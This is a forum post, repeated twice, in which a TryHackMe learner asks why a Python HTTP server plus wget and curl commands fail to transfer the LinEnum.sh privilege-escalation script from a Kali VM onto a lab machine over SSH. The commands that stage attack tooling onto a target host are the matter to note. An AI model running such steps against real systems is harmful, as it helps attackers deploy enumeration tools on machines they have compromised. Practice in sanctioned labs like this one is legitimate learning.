renemartin38
New Member
Hi,
I am doing TryHackMe stuff and I have problem to download the file to PC that I am connected to via SSH.
I use my Kali Linux VM and I am connected to deployed TryHackMe machine via SSH.
I use TryHackMe openvpn network.
I've created a server with python -m http.server 80 (I've tried 8000, too) in folder /root/Documents/server/LinEnum/.
When I am in ssh session, I can ping my machine but I cannot download that file with wget 10.11.29.97:8000:8000/LinEnum.sh either with curl http://10.11.29.97:8000/LinEnum.sh --output LinEnum.sh. I've tried to download it via scp but that was not working.
SSH:
SERVER:
Any ideas please?
I am doing TryHackMe stuff and I have problem to download the file to PC that I am connected to via SSH.
I use my Kali Linux VM and I am connected to deployed TryHackMe machine via SSH.
I use TryHackMe openvpn network.
I've created a server with python -m http.server 80 (I've tried 8000, too) in folder /root/Documents/server/LinEnum/.
When I am in ssh session, I can ping my machine but I cannot download that file with wget 10.11.29.97:8000:8000/LinEnum.sh either with curl http://10.11.29.97:8000/LinEnum.sh --output LinEnum.sh. I've tried to download it via scp but that was not working.
SSH:
SERVER:
Any ideas please?